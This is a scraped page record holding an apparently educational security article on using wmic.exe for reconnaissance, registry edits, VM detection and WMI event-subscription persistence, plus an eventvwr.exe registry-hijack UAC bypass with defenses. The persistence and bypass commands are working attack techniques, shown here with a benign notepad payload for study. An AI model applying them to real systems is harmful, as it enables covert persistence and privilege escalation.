[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1DTngvsPJXk0nIMiQCE6B6u78OJoLdFChahe7HSm6FU":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},152,"What is the main advantage of using wmic.exe over PowerShell for WMI operations?","Using wmic.exe allows you to perform WMI operations directly from the command prompt (cmd) without needing PowerShell. This makes it more straightforward for certain tasks, as demonstrated in the [Study Notes of WMI Persistence using wmic.exe](\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe). It's particularly useful for batch scripts or environments where PowerShell is restricted.","\u003Cp>Using wmic.exe allows you to perform WMI operations directly from the command prompt (cmd) without needing PowerShell. This makes it more straightforward for certain tasks, as demonstrated in the [Study Notes of WMI Persistence using wmic.exe](\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe). It&#39;s particularly useful for batch scripts or environments where PowerShell is restricted.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-main-advantage-of-using-wmicexe-over-powershell-for-wmi-operations-1777484968439","wmic.exe, WMI, cmd, PowerShell, information gathering",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},41,"Study Notes of WMI Persistence using wmic.exe","study-notes-of-wmi-persistence-using-wmic-exe","Explore WMI persistence methods using wmic.exe for system attacks and defense. Learn registry operations, information gathering, and security techniques in Windows environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied the method shared by Matt Graeber@mattifestation titled 'WMI Persistence using wmic.exe', which gave me new insights into WMI attack techniques. This article will combine previous research findings to share some techniques for leveraging wmic.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2016\u002F08\u002Fwmi-persistence-using-wmic.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In previous articles 'WMI Attacks', 'WMI Backdoor', and 'WMI Defense', I shared attack techniques implemented through Poweshell and mof invoking WMI.\u003C\u002Fp>\u003Cp>Similarly, using wmic.exe can achieve the same effect, and it is more direct—simply run commands directly in cmd.\u003C\u002Fp>\u003Ch2>0x02 Information Gathering\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain operating system-related information\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Poweshell code is as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_OperatingSystem\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019799937_0_0dfcc5a25f.png\">\u003C\u002Fp>\u003Cp>The command to switch to wmic.exe is:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem\u003C\u002Fp>\u003Cp>The echo is as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019815207_1_3782fbe621.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The format of the echoed content is not aligned; parameters need to be added to specify the output format\u003C\u002Fp>\u003Cp>To display line by line as in the PowerShell echo, the following parameters need to be added:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019827721_2_3f4c9ce008.png\">\u003C\u002Fp>\u003Cp>Following this format, other methods of querying WMI via PowerShell can also be implemented using wmic, for example:\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_ComputerSystem\u003C\u002Fp>\u003Cp>Corresponding\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Method to output results to a file:\u003C\u002Fp>\u003Cp>wmic \u002FOUTPUT:c:\\test\\1.txt \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x03 Registry Operations\u003C\u002Fh2>\u003Cp>PowerShell code as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\DEFAULT -Class StdRegProv\u003C\u002Fp>\u003Cp>Push-Location HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\u003C\u002Fp>\u003Cp>Get-ItemProperty Sys\u003C\u002Fp>\u003Cp>Complete wmic code as follows:\u003C\u002Fp>\u003Cp>Enumerate subkeys:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\"\u003C\u002Fp>\u003Cp>Registry content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019839866_3_fe2d05f124.png\">\u003C\u002Fp>\u003Cp>Command return results as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019860900_4_6fa0a399cb.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Method execution successful does not necessarily mean obtaining correct return results; attention must be paid to the correct parameter input here. As shown in Figure 2-6, intentionally omitting \" still prompts Method execution successful, but the return result is incorrect\u003C\u002Fp>\u003Cp>Enumerate specified key values:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumValues  ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019866520_5_90f576aaaf.jpeg\">\u003C\u002Fp>\u003Cp>Get the string data value of the specified value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call GetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\",\"TasksDir\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019870096_6_51a9c4f4ee.jpeg\">\u003C\u002Fp>\u003Cp>Create subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call CreateKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019874439_7_c504f233a6.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Note the permission issue; administrator privileges are required here.\u003C\u002Fp>\u003Cp>Set a string value for a named value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call SetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Data\",\"Name\"\u003C\u002Fp>\u003Cp>The result is as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019878050_8_9d04493685.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If a named value does not exist, it will be created; if it exists, it will be modified.\u003C\u002Fp>\u003Cp>Delete subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>Delete a named value setting:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Name\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above parameter descriptions are referenced from https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa393664(VS.85).aspx\u003C\u002Fp>\u003Cp>The meaning of the special character ^&amp;H80000002 is as follows:\u003C\u002Fp>\u003Cp>&amp;H80000000 'HKEY_CLASSES_ROOT'\u003C\u002Fp>\u003Cp>&amp;H80000001 'HKEY_CURRENT_USER\u003C\u002Fp>\u003Cp>&amp;H80000002 'HKEY_LOCAL_MACHINE\u003C\u002Fp>\u003Cp>&amp;H80000003 'HKEY_USERS\u003C\u002Fp>\u003Cp>&amp;H80000005 'HKEY_CURRENT_CONFIG\u003C\u002Fp>\u003Ch2>0x04 Virtual Machine Detection\u003C\u002Fh2>\u003Ch3>1. Check TotalPhysicalMemory and NumberOfLogicalProcessors\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET NumberOfLogicalProcessors,TotalPhysicalMemory \u002FFORMAT:list\u003C\u002Fp>\u003Cp>The returned result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019881652_9_a927c50e8a.jpeg\">\u003C\u002Fp>\u003Ch3>2. Check current processes\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_Process GET Caption \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x05 WMI Persistence\u003C\u002Fh2>\u003Cp>The complete PowerShell implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filterName = 'BotFilter82'\u003Cbr>$consumerName = 'BotConsumer23'\u003Cbr>$exePath = 'C:\\Windows\\System32\\notepad.exe'\u003Cbr>$Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=$filterName;EventNameSpace=\"root\\cimv2\";QueryLanguage=\"WQL\";Query=$Query} -ErrorAction Stop\u003Cbr>$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}\u003Cbr>Set-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, the corresponding WMIC invocation process is introduced step by step\u003C\u002Fp>\u003Ch3>1. Create an __EventFilter instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003C\u002Fp>\u003Ch3>2. Create an __EventConsumer instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003C\u002Fp>\u003Ch3>3. Create a __FilterToConsumerBinding instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003Ch3>4. List the __EventFilter and __EventConsumer instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Code viewed via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventConsumer\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\u003C\u002Fp>\u003Ch3>5. Remove all instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In wmic Binding's Filter parameter \"BotFilter82\", the \" must be changed to '\u003C\u002Fp>\u003Cp>Implementation code for cleanup via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter -Filter \"Name='BotFilter82'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class CommandLineEventConsumer -Filter \"Name='BotConsumer23'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding -Filter \"__Path LIKE '%BotFilter82%'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Ch2>0x05 fileless UAC bypass using eventvwr.exe and registry hijacking\u003C\u002Fh2>\u003Cp>Some wmic operations require administrator privileges, here's a recently learned UAC bypass technique\u003C\u002Fp>\u003Cp>\u003Cstrong>fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2016\u002F08\u002F15\u002Ffileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Author:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Nelson @enigma0x3\u003C\u002Fp>\u003Ch3>Principle\u003C\u002Fh3>\u003Cp>When the process eventvwr.exe starts, it first looks for the registry location HKCU\\Software\\Classes\\mscfile\\shell\\open\\command. If this location is empty, it then looks for the registry location HKCR\\mscfile\\shell\\open\\command (whose default value is %SystemRoot%\\system32\\mmc.exe \"%1\" %*), launches mmc.exe with high privileges, and finally opens eventvwr.msc.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019885508_10_13ecb422b5.jpeg\">\u003C\u002Fp>\u003Cp>Next, if a payload is added to the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command, the preset payload can be executed before launching mmc.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>The most important point:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the key value of the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command only requires standard user permissions.\u003C\u002Fp>\u003Ch3>Implementation\u003C\u002Fh3>\u003Cp>The author shared a PoC code implemented via PowerShell, with the link below:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fenigma0x3\u002FMisc-PowerShell-Stuff\u002Fblob\u002Fmaster\u002FInvoke-EventVwrBypass.ps1\u003C\u002Fp>\u003Cp>If the PoC executes successfully, it will write \"Is Elevated: True\" under C:\\UACBypassTest.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>By default, operations on files in the c:\\ directory will be blocked by UAC.\u003C\u002Fp>\u003Cp>I forked the author's code and made slight modifications, running the following command:\u003C\u002Fp>\u003Cp>C:\\Windows\\System32\\cmd.exe \u002Fc copy c:\\test\\1.txt c:\\1.txt\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>Advantages\u003C\u002Fh3>\u003Cp>This method differs significantly from conventional approaches, with the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Fileless\u003C\u002Fli>\u003Cli>No process injection required\u003C\u002Fli>\u003Cli>No need to copy privileged files\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Applicable Environments\u003C\u002Fh3>\u003Cp>Windows 7\u003C\u002Fp>\u003Cp>Windows 8.1\u003C\u002Fp>\u003Cp>Windows 10\u003C\u002Fp>\u003Ch3>Defense\u003C\u002Fh3>\u003Cul>\u003Cli>set the UAC level to \"Always Notify\"\u003C\u002Fli>\u003Cli>remove the current user from the Local Administrators group\u003C\u002Fli>\u003Cli>alert on new registry entries in HKCU\\Software\\Classes\\\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied the method shared by Matt Graeber@mattifestation titled 'WMI Persistence using wmic.exe', which gave me new insights into WMI attack techniques. This article will combine previous research findings to share some techniques for leveraging wmic.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2016\u002F08\u002Fwmi-persistence-using-wmic.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In previous articles 'WMI Attacks', 'WMI Backdoor', and 'WMI Defense', I shared attack techniques implemented through Poweshell and mof invoking WMI.\u003C\u002Fp>\u003Cp>Similarly, using wmic.exe can achieve the same effect, and it is more direct—simply run commands directly in cmd.\u003C\u002Fp>\u003Ch2>0x02 Information Gathering\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain operating system-related information\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Poweshell code is as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_OperatingSystem\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019799937_0_0dfcc5a25f-1.png\">\u003C\u002Fp>\u003Cp>The command to switch to wmic.exe is:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem\u003C\u002Fp>\u003Cp>The echo is as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019815207_1_3782fbe621-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The format of the echoed content is not aligned; parameters need to be added to specify the output format\u003C\u002Fp>\u003Cp>To display line by line as in the PowerShell echo, the following parameters need to be added:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019827721_2_3f4c9ce008-1.png\">\u003C\u002Fp>\u003Cp>Following this format, other methods of querying WMI via PowerShell can also be implemented using wmic, for example:\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_ComputerSystem\u003C\u002Fp>\u003Cp>Corresponding\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Method to output results to a file:\u003C\u002Fp>\u003Cp>wmic \u002FOUTPUT:c:\\test\\1.txt \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x03 Registry Operations\u003C\u002Fh2>\u003Cp>PowerShell code as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\DEFAULT -Class StdRegProv\u003C\u002Fp>\u003Cp>Push-Location HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\u003C\u002Fp>\u003Cp>Get-ItemProperty Sys\u003C\u002Fp>\u003Cp>Complete wmic code as follows:\u003C\u002Fp>\u003Cp>Enumerate subkeys:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\"\u003C\u002Fp>\u003Cp>Registry content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019839866_3_fe2d05f124-1.png\">\u003C\u002Fp>\u003Cp>Command return results as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019860900_4_6fa0a399cb-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Method execution successful does not necessarily mean obtaining correct return results; attention must be paid to the correct parameter input here. As shown in Figure 2-6, intentionally omitting \" still prompts Method execution successful, but the return result is incorrect\u003C\u002Fp>\u003Cp>Enumerate specified key values:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumValues  ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019866520_5_90f576aaaf-1.jpeg\">\u003C\u002Fp>\u003Cp>Get the string data value of the specified value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call GetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\",\"TasksDir\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019870096_6_51a9c4f4ee-1.jpeg\">\u003C\u002Fp>\u003Cp>Create subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call CreateKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019874439_7_c504f233a6-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Note the permission issue; administrator privileges are required here.\u003C\u002Fp>\u003Cp>Set a string value for a named value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call SetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Data\",\"Name\"\u003C\u002Fp>\u003Cp>The result is as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019878050_8_9d04493685-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If a named value does not exist, it will be created; if it exists, it will be modified.\u003C\u002Fp>\u003Cp>Delete subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>Delete a named value setting:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Name\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above parameter descriptions are referenced from https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa393664(VS.85).aspx\u003C\u002Fp>\u003Cp>The meaning of the special character ^&amp;H80000002 is as follows:\u003C\u002Fp>\u003Cp>&amp;H80000000 'HKEY_CLASSES_ROOT'\u003C\u002Fp>\u003Cp>&amp;H80000001 'HKEY_CURRENT_USER\u003C\u002Fp>\u003Cp>&amp;H80000002 'HKEY_LOCAL_MACHINE\u003C\u002Fp>\u003Cp>&amp;H80000003 'HKEY_USERS\u003C\u002Fp>\u003Cp>&amp;H80000005 'HKEY_CURRENT_CONFIG\u003C\u002Fp>\u003Ch2>0x04 Virtual Machine Detection\u003C\u002Fh2>\u003Ch3>1. Check TotalPhysicalMemory and NumberOfLogicalProcessors\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET NumberOfLogicalProcessors,TotalPhysicalMemory \u002FFORMAT:list\u003C\u002Fp>\u003Cp>The returned result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" 